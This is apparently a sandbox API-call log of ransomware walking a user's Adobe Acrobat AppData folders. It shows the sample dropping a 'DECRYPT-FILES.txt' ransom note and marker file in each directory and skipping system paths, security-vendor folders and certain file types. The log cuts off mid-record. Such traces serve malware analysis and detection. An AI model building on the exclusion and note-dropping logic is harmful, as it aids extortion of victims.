0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\All Users") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.753] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="AhnLab") returned 0x0 [0076.754] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0076.754] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.754] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\jkbimi8.tmp") returned 72 [0076.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0076.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0076.754] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.754] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\DECRYPT-FILES.txt") returned 78 [0076.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0076.754] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0076.755] CloseHandle (hObject=0x44c) returned 1 [0076.755] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\") returned 60 [0076.755] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*" [0076.755] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0076.756] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.756] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.756] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.756] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.756] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec7c9cd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec7c9cd0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0076.756] lstrcmpW (lpString1="10.0", lpString2=".") returned 1 [0076.756] lstrcmpW (lpString1="10.0", lpString2="..") returned 1 [0076.756] lstrcatW (in: lpString1="10.0", lpString2="\\" | out: lpString1="10.0\\") returned="10.0\\" [0076.756] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="10.0\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\" [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Program Files") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch=":\\Windows") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Games\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\All Users") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="AhnLab") returned 0x0 [0076.756] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0076.757] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.757] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\jkbimi8.tmp") returned 77 [0076.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0076.757] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0076.757] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.757] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\DECRYPT-FILES.txt") returned 83 [0076.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0076.759] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0076.760] CloseHandle (hObject=0x454) returned 1 [0076.760] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\") returned 65 [0076.760] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*" [0076.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0076.760] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.760] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.761] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.761] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.761] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9f48400, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xd9f48400, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Collab", cAlternateFileName="")) returned 1 [0076.761] lstrcmpW (lpString1="Collab", lpString2=".") returned 1 [0076.761] lstrcmpW (lpString1="Collab", lpString2="..") returned 1 [0076.761] lstrcatW (in: lpString1="Collab", lpString2="\\" | out: lpString1="Collab\\") returned="Collab\\" [0076.761] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\", lpString2="Collab\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Program Files") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch=":\\Windows") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Games\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Tor Browser\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\ProgramData\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\All Users") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\IETldCache\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\Local Settings\\") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="\\AppData\\Local") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="AhnLab") returned 0x0 [0076.761] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0076.761] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0076.761] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.761] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\jkbimi8.tmp") returned 84 [0076.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x458 [0076.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0076.762] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0076.762] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\DECRYPT-FILES.txt") returned 90 [0076.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x45c [0076.763] WriteFile (in: hFile=0x45c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0076.764] CloseHandle (hObject=0x45c) returned 1 [0076.764] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0076.764] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*" [0076.764] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d58 [0076.765] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.765] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9f48400, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.765] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.765] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.765] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f6fa20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.765] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.765] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0076.765] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0076.765] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.765] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0076.765] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0076.765] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0076.765] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0076.765] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned 72 [0076.765] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0076.765] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\" [0076.765] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\jkbimi8.tmp" [0076.766] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Collab\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0076.766] CloseHandle (hObject=0x0) returned 0 [0076.766] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.766] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0076.766] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0076.766] CloseHandle (hObject=0x458) returned 1 [0076.766] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9f498c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0076.766] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0076.767] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd9df17a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9df17a0, 